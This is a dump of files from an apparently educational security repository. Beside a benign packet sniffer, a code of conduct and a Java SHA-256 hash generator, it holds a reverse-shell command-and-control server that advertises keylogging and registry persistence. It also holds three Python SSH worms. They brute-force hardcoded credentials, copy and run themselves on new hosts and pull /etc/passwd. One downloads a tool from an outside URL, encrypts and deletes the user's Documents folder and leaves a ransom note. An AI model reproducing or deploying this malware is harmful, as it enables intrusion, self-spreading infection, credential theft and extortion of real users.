(srcMac[0:2], srcMac[2:4], srcMac[4:6], srcMac[6:8], srcMac[8:10], srcMac[10:12])) 111 | print('Protocol: %hu\n' % protocol) 112 | 113 | if protocol == 0x08: 114 | ipBool = True 115 | 116 | return data, ipBool 117 | 118 | def main(): 119 | global socketCreated 120 | global socketSniffer 121 | 122 | if socketCreated == False: 123 | socketSniffer = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0003)) 124 | socketCreated = True; 125 | 126 | dataRecv = socketSniffer.recv(2048) 127 | os.system('clear') 128 | 129 | dataRecv, ipBool = analyzeEtherHeader(dataRecv) 130 | 131 | if ipBool: 132 | dataRecv, tcp_udp = analyzeIP(dataRecv) 133 | else: 134 | return 135 | 136 | if tcp_udp == "TCP": 137 | dataRecv = analyzeTCPHeader(dataRecv) 138 | elif tcp_udp == "UDP": 139 | dataRecv = analyzeUDPHeader(dataRecv) 140 | else: 141 | return 142 | 143 | while True: 144 | main() 145 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | mail. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | -------------------------------------------------------------------------------- /Reverse_Shell/commandandcontrol.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import termcolor 3 | import json 4 | import os 5 | import threading 6 | 7 | 8 | 9 | def reliable_recv(target): 10 | data = '' 11 | while True: 12 | try: 13 | data = data + target.recv(1024).decode().rstrip() 14 | return json.loads(data) 15 | except ValueError: 16 | continue 17 | 18 | def reliable_send(target, data): 19 | jsondata = json.dumps(data) 20 | target.send(jsondata.encode()) 21 | 22 | def upload_file(target, file_name): 23 | f = open(file_name, 'rb') 24 | target.send(f.read()) 25 | 26 | def download_file(target, file_name): 27 | f = open(file_name, 'wb') 28 | target.settimeout(1) 29 | chunk = target.recv(1024) 30 | while chunk: 31 | f.write(chunk) 32 | try: 33 | chunk = target.recv(1024) 34 | except socket.timeout as e: 35 | break 36 | target.settimeout(None) 37 | f.close() 38 | 39 | 40 | def target_communication(target, ip): 41 | count = 0 42 | while True: 43 | command = input('* Shell~%s: ' % str(ip)) 44 | reliable_send(target, command) 45 | if command == 'quit': 46 | break 47 | elif command == 'background': 48 | break 49 | elif command == 'clear': 50 | os.system('clear') 51 | elif command[:3] == 'cd ': 52 | pass 53 | elif command[:6] == 'upload': 54 | upload_file(target, command[7:]) 55 | elif command[:8] == 'download': 56 | download_file(target, command[9:]) 57 | elif command[:10] == 'screenshot': 58 | f = open('screenshot%d' % (count), 'wb') 59 | target.settimeout(3) 60 | chunk = target.recv(1024) 61 | while chunk: 62 | f.write(chunk) 63 | try: 64 | chunk = target.recv(1024) 65 | except socket.timeout as e: 66 | break 67 | target.settimeout(None) 68 | f.close() 69 | count += 1 70 | elif command == 'help': 71 | print(termcolor.colored('''\n 72 | quit --> Quit Session With The Target 73 | clear --> Clear The Screen 74 | cd *Directory Name* --> Changes Directory On Target System 75 | upload *file name* --> Upload File To The target Machine 76 | download *file name* --> Download File From Target Machine 77 | keylog_start --> Start The Keylogger 78 | keylog_dump --> Print Keystrokes That The Target Inputted 79 | keylog_stop --> Stop And Self Destruct Keylogger File 80 | persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green') 81 | else: 82 | result = reliable_recv(target) 83 | print(result) 84 | 85 | def accept_connections(): 86 | while True: 87 | if stop_flag: 88 | break 89 | sock.settimeout(1) 90 | try: 91 | target, ip = sock.accept() 92 | targets.append(target) 93 | ips.append(ip) 94 | print(termcolor.colored(str(ip) + ' has connected!', 'green')) 95 | except: 96 | pass 97 | 98 | 99 | targets = [] 100 | ips = [] 101 | stop_flag = False 102 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 103 | sock.bind(('127.0.0.1', 5555)) 104 | sock.listen(5) 105 | t1 = threading.Thread(target=accept_connections) 106 | t1.start() 107 | print(termcolor.colored('[+] Waiting For The Incoming Connections ...', 'green')) 108 | 109 | while True: 110 | command = input('[**] Command & Control Center: ') 111 | if command == 'targets': 112 | counter = 0 113 | for ip in ips: 114 | print('Session ' + str(counter) + ' --- ' + str(ip)) 115 | counter += 1 116 | elif command == 'clear': 117 | os.system('clear') 118 | elif command[:7] == 'session': 119 | try: 120 | num = int(command[8:]) 121 | tarnum = targets[num] 122 | tarip = ips[num] 123 | target_communication(tarnum, tarip) 124 | except: 125 | print('[-] No Session Under That ID Number') 126 | elif command == 'exit': 127 | for target in targets: 128 | reliable_send(target, 'quit') 129 | target.close() 130 | sock.close() 131 | stop_flag = True 132 | t1.join() 133 | break 134 | elif command[:4] == 'kill': 135 | targ = targets[int(command[5:])] 136 | ip = ips[int(command[5:])] 137 | reliable_send(targ, 'quit') 138 | targ.close() 139 | targets.remove(targ) 140 | ips.remove(ip) 141 | elif command[:7] == 'sendall': 142 | x = len(targets) 143 | print(x) 144 | i = 0 145 | try: 146 | while i < x: 147 | tarnumber = targets[i] 148 | print(tarnumber) 149 | reliable_send(tarnumber, command) 150 | i += 1 151 | except: 152 | print('Failed') 153 | else: 154 | print(termcolor.colored('[!!] Command Doesnt Exist', 'red')) 155 | 156 | -------------------------------------------------------------------------------- /Hash_Generator_And_Cracker/Hash_Generator_256.java: -------------------------------------------------------------------------------- 1 | // Package name here 2 | 3 | import javax.swing.*; 4 | import java.awt.*; 5 | import java.awt.event.*; 6 | import java.math.BigInteger; 7 | import java.nio.charset.StandardCharsets; 8 | import java.security.MessageDigest; 9 | import java.security.NoSuchAlgorithmException; 10 | // Imported all needed libraries 11 | 12 | public class SHA_256 { 13 | // This is Main class 14 | JFrame frame; 15 | JLabel label, label_Data, label_Hash; 16 | JTextField text_Data,text_Hash; 17 | JButton get_button, reset_Button, quit_Button; 18 | Icon cross_icon; 19 | // Declaration of all Swing variables 20 | 21 | SHA_256(){ 22 | // Begining of Constructor 23 | frame=new JFrame("SHA_256"); 24 | frame.setLayout(null); 25 | frame.setSize(500,370); 26 | frame.setVisible(true); 27 | frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); 28 | // Frame Properites are set with no layout 29 | 30 | label=new JLabel("Hash Genrator"); 31 | label.setFont(new Font("Serif", Font.BOLD, 26)); 32 | label.setBounds(180,10,200,40); 33 | // Label Properites for top label 34 | 35 | label_Data = new JLabel("Enter data:"); 36 | label_Data.setFont(new Font("Monospace", Font.BOLD,15)); 37 | label_Data.setBounds(70,70,90,40); 38 | text_Data=new JTextField(""); 39 | text_Data.setBounds(170, 77,210,30); 40 | // Label for data and field for input created 41 | 42 | label_Hash = new JLabel("Hash: "); 43 | label_Hash.setFont(new Font("Monospace", Font.BOLD,15)); 44 | label_Hash.setBounds(70,120,80,40); 45 | text_Hash= new JTextField(); 46 | text_Hash.setBounds(30, 180, 430, 50); 47 | text_Hash.setAlignmentX(FlowLayout.CENTER); 48 | // Label for Hash Text and output field created 49 | 50 | get_button=new JButton("GET HASH"); 51 | get_button.setBounds(170, 126, 130, 30); 52 | get_button.setFont(new Font("Times_New_Roman",Font.BOLD,15)); 53 | // Button for executing encryption 54 | 55 | 56 | reset_Button=new JButton("Reset"); 57 | reset_Button.setBounds(100, 250, 100, 40); 58 | reset_Button.setFont(new Font("Times_New_Roman", Font.BOLD, 15)); 59 | // Button for reset both TextFields ie. text_Data and text_Hash 60 | 61 | cross_icon= new ImageIcon("C:\\Users\\ankit\eclipse-workspace\\programs\\src\\package\\quit_image.png"); 62 | quit_Button=new JButton(cross_icon); 63 | quit_Button.setBounds(300, 250, 100, 40); 64 | quit_Button.setFont(new Font("Times_New_Roman", Font.BOLD, 15)); 65 | // Button for quiting the program with image icon 66 | 67 | 68 | frame.setIconImage(new ImageIcon("C:\\Users\\ankit\\eclipse-workspace\\programs\\src\\package\\lock_png_1.png").getImage()); 69 | // Setting icon or favicon in JFrame 70 | 71 | get_button.addActionListener(new ActionListener() { 72 | public void actionPerformed(ActionEvent e) { 73 | 74 | String str2=text_Data.getText(); 75 | if(str2.length()>1) { 76 | try { 77 | text_Hash.setText(toHex(getSHA(str2))); 78 | } catch (NoSuchAlgorithmException e1) { 79 | e1.printStackTrace(); 80 | } 81 | } 82 | else { 83 | JOptionPane.showMessageDialog(null,"Give some INPUT!!","Input Error", JOptionPane.WARNING_MESSAGE, null); 84 | } 85 | } 86 | }); 87 | // Get_Hash button's ActionListner calls encryption method for Hashing and shows output in text_Hash 88 | 89 | reset_Button.addActionListener(new ActionListener() { 90 | public void actionPerformed(ActionEvent e) { 91 | text_Data.setText(""); 92 | text_Hash.setText(""); 93 | } 94 | }); 95 | // reset_Button's ActionListner clears all the text in text_Data and text_Hash 96 | 97 | 98 | quit_Button.addActionListener(new ActionListener() { 99 | public void actionPerformed(ActionEvent e) { 100 | System.exit(0); 101 | }}); 102 | // quit_Button will quit the program by returning 0 ie. normal termination of program. 103 | 104 | frame.add(label_Data); 105 | frame.add(label_Hash); 106 | frame.add(text_Data); 107 | frame.add(text_Hash); 108 | frame.add(label); 109 | frame.add(get_button); 110 | frame.add(reset_Button); 111 | frame.add(quit_Button); 112 | frame.getContentPane(); 113 | frame.setResizable(false); 114 | frame.setLocationRelativeTo(null); 115 | // Adding all the elements to frame 116 | } 117 | // End of Constructor 118 | 119 | public static byte[] getSHA(String input) throws NoSuchAlgorithmException { 120 | MessageDigest md= MessageDigest.getInstance("SHA-256"); 121 | //takes arbitrary-sized data and output a fixed-length hash value 122 | return md.digest(input.getBytes(StandardCharsets.UTF_8)); 123 | } 124 | //Method returns hash values or message digest 125 | 126 | public static String toHex(byte[] Hash) { 127 | BigInteger n=new BigInteger(1,Hash); 128 | StringBuilder hex=new StringBuilder(n.toString(16)); 129 | // Convert message digest into hexadecimal value 130 | 131 | while(hex.length()<64) { 132 | hex.insert(0, '0'); 133 | } 134 | 135 | return hex.toString(); 136 | } 137 | // Returns string with hash code 138 | 139 | 140 | public static void main(String[] args) throws Exception{ 141 | SHA_256 Object= new SHA_256(); 142 | Object.getClass(); 143 | } 144 | //End of Main 145 | } 146 | -------------------------------------------------------------------------------- /Worms/Pass.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | import nmap 4 | import os 5 | import urllib 6 | import socket 7 | import fcntl 8 | import struct 9 | import netifaces 10 | from subprocess import call 11 | 12 | # The list of credentials to attempt 13 | credList = [ 14 | ('ubuntu', '123456'), 15 | ('hello', 'world'), 16 | ('hello1', 'world'), 17 | ('root', '#Gig#'), 18 | ('cpsc', 'cpsc') 19 | ] 20 | 21 | # The marker 22 | INFECTION_MARKER_FILE = "infectedPT.txt" 23 | 24 | 25 | def markInfected(): 26 | # Open the file 27 | markerFile = open(INFECTION_MARKER_FILE, "w") 28 | 29 | # Write something to the file 30 | markerFile.write("Dude where the Worms AT?") 31 | 32 | markerFile.close() 33 | 34 | 35 | 36 | def isInfected(): 37 | if (os.path.exists(INFECTION_MARKER_FILE)): 38 | return True 39 | else: 40 | return False 41 | 42 | 43 | 44 | def getHostsOnTheSameNetwork(): 45 | # Create an instance of the port scanner class 46 | portScanner = nmap.PortScanner() 47 | 48 | # Scan the network for systems whose 49 | # port 22 is open (that is, there is possibly 50 | # SSH running there). 51 | portScanner.scan('192.168.1.0/24', arguments='-p 22 --open') 52 | 53 | # Scan the network for hoss 54 | hostInfo = portScanner.all_hosts() 55 | 56 | # The list of hosts that are up. 57 | liveHosts = [] 58 | 59 | # Go trough all the hosts returned by nmap 60 | # and remove all who are not up and running 61 | for host in hostInfo: 62 | 63 | # Is ths host up? 64 | if portScanner[host].state() == "up": 65 | liveHosts.append(host) 66 | 67 | return liveHosts 68 | 69 | 70 | 71 | def spreadAndExecute(sshClient): 72 | 73 | sftpClient = sshClient.open_sftp() 74 | 75 | 76 | sftpClient.put(__file__, "PassThief.py") 77 | 78 | # Make the worm file exeutable on the remote system 79 | sshClient.exec_command("chmod a+x PassThief.py") 80 | 81 | sshClient.exec_command("nohup python PassThief.py &") 82 | return 83 | 84 | 85 | 86 | def tryCredentials(host, userName, password, sshClient): 87 | # Try to connect to the remote host 88 | try: 89 | print 90 | "Attacking host: " + host + "..." + userName, 91 | sshClient.connect(host, username=userName, password=password) 92 | print 93 | "Success!" 94 | return 0 95 | # The SSH is down 96 | except socket.error: 97 | print 98 | "The system seems to be no longer up!" 99 | return 3 100 | except paramiko.ssh_exception.AuthenticationException: 101 | print 102 | "Wrong credentials!" 103 | return 1 104 | 105 | 106 | 107 | def attackSystem(host): 108 | # The credential list 109 | global credList 110 | 111 | # Create an instance of the SSH client 112 | ssh = paramiko.SSHClient() 113 | 114 | # Set some parameters to make things easier. 115 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 116 | 117 | # The results of an attempt 118 | attemptResults = None 119 | 120 | for (username, password) in credList: 121 | temp = tryCredentials(host, username, password, ssh) 122 | 123 | if (temp == 0): 124 | return (ssh, username, password) 125 | elif (temp == 1): 126 | pass 127 | elif (temp == 3): 128 | break 129 | else: 130 | pass 131 | 132 | # Couldn't find Good Creds 133 | return None 134 | 135 | 136 | def getMyIP(): 137 | # Get all the network interfaces on the system 138 | networkInterfaces = netifaces.interfaces() 139 | 140 | # The IP address 141 | ipAddr = None 142 | 143 | # Go through all the interfaces 144 | for netFace in networkInterfaces: 145 | 146 | # The IP address of the interface 147 | addr = netifaces.ifaddresses(netFace)[2][0]['addr'] 148 | 149 | # Get the IP address 150 | if not addr == "127.0.0.1": 151 | # Save the IP addrss and break 152 | ipAddr = addr 153 | break 154 | 155 | return ipAddr 156 | 157 | 158 | print 159 | getMyIP() 160 | 161 | 162 | def stealPasswords(theifIP, currentIP): 163 | theifssh = attackSystem(theifIP) 164 | 165 | sftp = theifssh.open_sftp() 166 | 167 | sftp.get("/etc/passwd", "StolenGoodies" + currentIP) 168 | 169 | 170 | if len(sys.argv) < 2: 171 | 172 | AttackingIP = sys.argv[1] 173 | # TODO: If we are running on the victim, check if 174 | # the victim was already infected. If so, terminate. 175 | # Otherwise, proceed with malice. 176 | if isInfected(): 177 | print 178 | "System has been PwD" 179 | pass 180 | else: 181 | 182 | # TODO: Get the IP of the current system 183 | myIP = getMyIP() 184 | 185 | # Get the hosts on the same network 186 | networkHosts = getHostsOnTheSameNetwork() 187 | 188 | for index in range(len(networkHosts) - 1): 189 | if (networkHosts[index] == myIP): 190 | del networkHosts[index] 191 | 192 | # TODO: Remove the IP of the current system 193 | # from the list of discovered systems (we 194 | # do not want to target ourselves!). 195 | print 196 | "Found hosts: ", networkHosts 197 | 198 | # Go through the network hosts 199 | for host in networkHosts: 200 | 201 | # Try to attack this host 202 | sshInfo = attackSystem(host) 203 | 204 | print 205 | sshInfo 206 | 207 | # Did the attack succeed? 208 | if sshInfo: 209 | stealPasswords(AttackingIP, myIP) 210 | 211 | print 212 | "Trying to spread" 213 | 214 | spreadAndExecute(sshInfo[0]) 215 | 216 | print("Spreading complete") 217 | sys.exit(0) 218 | -------------------------------------------------------------------------------- /Worms/Replicator.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | import nmap 4 | import os 5 | import urllib 6 | import socket 7 | import fcntl 8 | import struct 9 | import netifaces 10 | from subprocess import call 11 | 12 | # The list of credentials to attempt 13 | credList = [ 14 | ('ubuntu', '123456'), 15 | ('hello', 'world'), 16 | ('hello1', 'world'), 17 | ('root', '#Gig#'), 18 | ('cpsc', 'cpsc') 19 | ] 20 | 21 | # The marker 22 | INFECTION_MARKER_FILE = "infectedRR.txt" 23 | 24 | 25 | def markInfected(): 26 | # Open the file 27 | markerFile = open(INFECTION_MARKER_FILE, "w") 28 | 29 | # Write something to the file 30 | markerFile.write("Dude where the Worms AT?") 31 | 32 | markerFile.close() 33 | 34 | 35 | 36 | def isInfected(): 37 | if (os.path.exists(INFECTION_MARKER_FILE)): 38 | return True 39 | else: 40 | return False 41 | 42 | 43 | 44 | def getHostsOnTheSameNetwork(): 45 | # Create an instance of the port scanner class 46 | portScanner = nmap.PortScanner() 47 | 48 | # Scan the network for systems whose 49 | # port 22 is open (that is, there is possibly 50 | # SSH running there). 51 | portScanner.scan('192.168.1.0/24', arguments='-p 22 --open') 52 | 53 | # Scan the network for hoss 54 | hostInfo = portScanner.all_hosts() 55 | 56 | # The list of hosts that are up. 57 | liveHosts = [] 58 | 59 | # Go trough all the hosts returned by nmap 60 | # and remove all who are not up and running 61 | for host in hostInfo: 62 | 63 | # Is ths host up? 64 | if portScanner[host].state() == "up": 65 | liveHosts.append(host) 66 | 67 | return liveHosts 68 | 69 | 70 | 71 | def spreadAndExecute(sshClient): 72 | # Create an instance of the SFTP class; used 73 | # for uploading/downloading files and executing 74 | # commands. 75 | sftpClient = sshClient.open_sftp() 76 | 77 | # Copy your self to the remote system (i.e. the other VM). 78 | # We are assuming the 79 | # password has already been cracked. The worm is placed in the /tmp 80 | # directory on the remote system. 81 | sftpClient.put(__file__, "Replicator.py") 82 | 83 | # Make the worm file exeutable on the remote system 84 | sshClient.exec_command("chmod a+x Replicator.py") 85 | 86 | # Execute the worm! 87 | # nohup - keep the worm running after we disconnect. 88 | # python - the python interpreter 89 | # /tmp/worm.py - the worm script 90 | # & - run the whole commnad in the background 91 | sshClient.exec_command("nohup python Replicator.py &") 92 | return 93 | 94 | 95 | 96 | def tryCredentials(host, userName, password, sshClient): 97 | # Try to connect to the remote host 98 | try: 99 | print 100 | "Attacking host: " + host + "..." + userName, 101 | sshClient.connect(host, username=userName, password=password) 102 | print 103 | "Success!" 104 | return 0 105 | # The SSH is down 106 | except socket.error: 107 | print 108 | "The system seems to be no longer up!" 109 | return 3 110 | except paramiko.ssh_exception.AuthenticationException: 111 | print 112 | "Wrong credentials!" 113 | return 1 114 | 115 | 116 | 117 | def attackSystem(host): 118 | # The credential list 119 | global credList 120 | 121 | # Create an instance of the SSH client 122 | ssh = paramiko.SSHClient() 123 | 124 | # Set some parameters to make things easier. 125 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 126 | 127 | # The results of an attempt 128 | attemptResults = None 129 | 130 | for (username, password) in credList: 131 | temp = tryCredentials(host, username, password, ssh) 132 | 133 | if (temp == 0): 134 | return (ssh, username, password) 135 | elif (temp == 1): 136 | pass 137 | elif (temp == 3): 138 | break 139 | else: 140 | pass 141 | 142 | # Couldn't find Good Creds 143 | return None 144 | 145 | 146 | 147 | def getMyIP(): 148 | # Get all the network interfaces on the system 149 | networkInterfaces = netifaces.interfaces() 150 | 151 | # The IP address 152 | ipAddr = None 153 | 154 | # Go through all the interfaces 155 | for netFace in networkInterfaces: 156 | 157 | # The IP address of the interface 158 | addr = netifaces.ifaddresses(netFace)[2][0]['addr'] 159 | 160 | # Get the IP address 161 | if not addr == "127.0.0.1": 162 | # Save the IP addrss and break 163 | ipAddr = addr 164 | break 165 | 166 | return ipAddr 167 | 168 | 169 | print 170 | getMyIP() 171 | 172 | 173 | 174 | if len(sys.argv) < 2: 175 | 176 | # TODO: If we are running on the victim, check if 177 | # the victim was already infected. If so, terminate. 178 | # Otherwise, proceed with malice. 179 | if isInfected(): 180 | print 181 | "System has been PwD" 182 | pass 183 | else: 184 | 185 | # TODO: Get the IP of the current system 186 | myIP = getMyIP() 187 | 188 | # Get the hosts on the same network 189 | networkHosts = getHostsOnTheSameNetwork() 190 | 191 | for index in range(len(networkHosts) - 1): 192 | if (networkHosts[index] == myIP): 193 | del networkHosts[index] 194 | 195 | # TODO: Remove the IP of the current system 196 | # from the list of discovered systems (we 197 | # do not want to target ourselves!). 198 | print 199 | "Found hosts: ", networkHosts 200 | 201 | # Go through the network hosts 202 | for host in networkHosts: 203 | 204 | # Try to attack this host 205 | sshInfo = attackSystem(host) 206 | 207 | print 208 | sshInfo 209 | 210 | # Did the attack succeed? 211 | if sshInfo: 212 | print 213 | "Trying to spread" 214 | 215 | spreadAndExecute(sshInfo[0]) 216 | 217 | print 218 | "Spreading complete" 219 | sys.exit(0) 220 | -------------------------------------------------------------------------------- /Worms/Extoter.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | import nmap 4 | import os 5 | import urllib 6 | import socket 7 | import fcntl 8 | import struct 9 | import netifaces 10 | import tarfile 11 | import shutil 12 | from subprocess import call 13 | 14 | # The list of credentials to attempt 15 | credList = [ 16 | ('ubuntu', '123456'), 17 | ('hello', 'world'), 18 | ('hello1', 'world'), 19 | ('root', '#Gig#'), 20 | ('cpsc', 'cpsc') 21 | ] 22 | 23 | # The marker 24 | INFECTION_MARKER_FILE = "infectedEE.txt" 25 | 26 | HOSTIP = None 27 | 28 | 29 | 30 | def markInfected(): 31 | # Open the file 32 | markerFile = open(INFECTION_MARKER_FILE, "w") 33 | 34 | # Write something to the file 35 | markerFile.write("Dude where the Worms AT?") 36 | 37 | markerFile.close() 38 | 39 | 40 | def isInfected(): 41 | if (os.path.exists(INFECTION_MARKER_FILE)): 42 | return True 43 | else: 44 | return False 45 | 46 | 47 | def getHostsOnTheSameNetwork(): 48 | # Create an instance of the port scanner class 49 | portScanner = nmap.PortScanner() 50 | 51 | # Scan the network for systems whose 52 | # port 22 is open (that is, there is possibly 53 | # SSH running there). 54 | portScanner.scan('192.168.1.0/24', arguments='-p 22 --open') 55 | 56 | # Scan the network for hoss 57 | hostInfo = portScanner.all_hosts() 58 | 59 | # The list of hosts that are up. 60 | liveHosts = [] 61 | 62 | # Go trough all the hosts returned by nmap 63 | # and remove all who are not up and running 64 | for host in hostInfo: 65 | 66 | # Is ths host up? 67 | if portScanner[host].state() == "up": 68 | liveHosts.append(host) 69 | 70 | return liveHosts 71 | 72 | 73 | def spreadAndExecute(sshClient): 74 | # Create an instance of the SFTP class; used 75 | # for uploading/downloading files and executing 76 | # commands. 77 | sftpClient = sshClient.open_sftp() 78 | 79 | # Copy your self to the remote system (i.e. the other VM). 80 | # We are assuming the 81 | # password has already been cracked. The worm is placed in the /tmp 82 | # directory on the remote system. 83 | sftpClient.put(__file__, "Extorter.py") 84 | 85 | # Make the worm file exeutable on the remote system 86 | sshClient.exec_command("chmod a+x Extorter.py") 87 | 88 | # Execute the worm! 89 | # nohup - keep the worm running after we disconnect. 90 | # python - the python interpreter 91 | # /tmp/worm.py - the worm script 92 | # & - run the whole commnad in the background 93 | sshClient.exec_command("nohup python Extorter.py &") 94 | return 95 | 96 | 97 | def tryCredentials(host, userName, password, sshClient): 98 | # Try to connect to the remote host 99 | try: 100 | print 101 | "Attacking host: " + host + "..." + userName, 102 | sshClient.connect(host, username=userName, password=password) 103 | print 104 | "Success!" 105 | return 0 106 | # The SSH is down 107 | except socket.error: 108 | print 109 | "The system seems to be no longer up!" 110 | return 3 111 | except paramiko.ssh_exception.AuthenticationException: 112 | print 113 | "Wrong credentials!" 114 | return 1 115 | 116 | 117 | def attackSystem(host): 118 | # The credential list 119 | global credList 120 | 121 | # Create an instance of the SSH client 122 | ssh = paramiko.SSHClient() 123 | 124 | # Set some parameters to make things easier. 125 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 126 | 127 | # The results of an attempt 128 | attemptResults = None 129 | 130 | for (username, password) in credList: 131 | temp = tryCredentials(host, username, password, ssh) 132 | 133 | if (temp == 0): 134 | return (ssh, username, password) 135 | elif (temp == 1): 136 | pass 137 | elif (temp == 3): 138 | break 139 | else: 140 | pass 141 | 142 | # Couldn't find Good Creds 143 | return None 144 | 145 | 146 | def getMyIP(): 147 | # Get all the network interfaces on the system 148 | networkInterfaces = netifaces.interfaces() 149 | 150 | # The IP address 151 | ipAddr = None 152 | 153 | # Go through all the interfaces 154 | for netFace in networkInterfaces: 155 | 156 | # The IP address of the interface 157 | addr = netifaces.ifaddresses(netFace)[2][0]['addr'] 158 | 159 | # Get the IP address 160 | if not addr == "127.0.0.1": 161 | # Save the IP addrss and break 162 | ipAddr = addr 163 | break 164 | 165 | return ipAddr 166 | 167 | 168 | 169 | def extorter(): 170 | global HOSTIP 171 | 172 | # Fetch a file from the 173 | # web at the given URL. The first argument 174 | # is the URL from which to fetch the file. 175 | # The second argument tells the function 176 | # what to name of the file once download 177 | # completes. 178 | urllib.urlretrieve("http://emerald.ecs.fullerton.edu/~mgofman/openssl", "/tmp/openssl") 179 | print 180 | "Downloading openssl" 181 | 182 | # Open the specified archive file (e.g. exdir.tar). 183 | # If the archive does not already exit, create it. 184 | tar = tarfile.open(HOSTIP + "_PWD_DOCS.tar", "w:gz") 185 | 186 | # Add the exdir/ directory to the archive 187 | tar.add("/home/ubuntu/Documents/") 188 | 189 | # Close the archive file 190 | tar.close() 191 | print 192 | "Tar'ing" 193 | 194 | # Delete directory exdir2/ 195 | shutil.rmtree('/home/ubuntu/Documents/') 196 | 197 | # The following is an example which makes 198 | # program openssl executable once you download 199 | # it from the web. The code that follows is 200 | # equivalent to running chmod a+x openssl 201 | # from the shell command line. 202 | # The format is , , , 203 | # ..., where each ARGi is an argument. 204 | call(["chmod", "a+x", "/tmp/openssl"]) 205 | 206 | # The code below is equivalent to running line: 207 | # openssl aes-256-cbc -a -salt -in secrets.txt -out secrets.txt.enc 208 | # from the shell prompt. 209 | # You do not need to understand the details of how 210 | # this program works. Basically, "runprog.py" is the 211 | # input file to the program which we would like to 212 | # encrypt, "runprog.py.enc" is the output file 213 | # containing encrypted contents of file 214 | # "runprog.py.enc" and "pass" is the password. 215 | call(["/tmp/openssl", "aes-256-cbc", "-a", "-salt", "-in", HOSTIP + "_PWD_DOCS.tar", "-out", 216 | HOSTIP + "_PWD_DOCS.tar.enc", "-k", "cs456worm"]) 217 | print 218 | "Encrpyting" 219 | 220 | os.remove("/home/ubuntu/" + HOSTIP + "_PWD_DOCS.tar") 221 | 222 | markerFile = open("PayMeNowNOOB", "w") 223 | 224 | # Write something to the file 225 | markerFile.write("Your DOCUMENTS DIR HAS BEEN PWD, Contact me at PwDnooBAllDay@gmail.com for password") 226 | markerFile.close() 227 | 228 | 229 | 230 | 231 | 232 | if len(sys.argv) < 2: 233 | 234 | # TODO: If we are running on the victim, check if 235 | # the victim was already infected. If so, terminate. 236 | # Otherwise, proceed with malice. 237 | if isInfected(): 238 | print 239 | "System has been PwD" 240 | pass 241 | else: 242 | 243 | # TODO: Get the IP of the current system 244 | myIP = getMyIP() 245 | 246 | # Get the hosts on the same network 247 | networkHosts = getHostsOnTheSameNetwork() 248 | 249 | 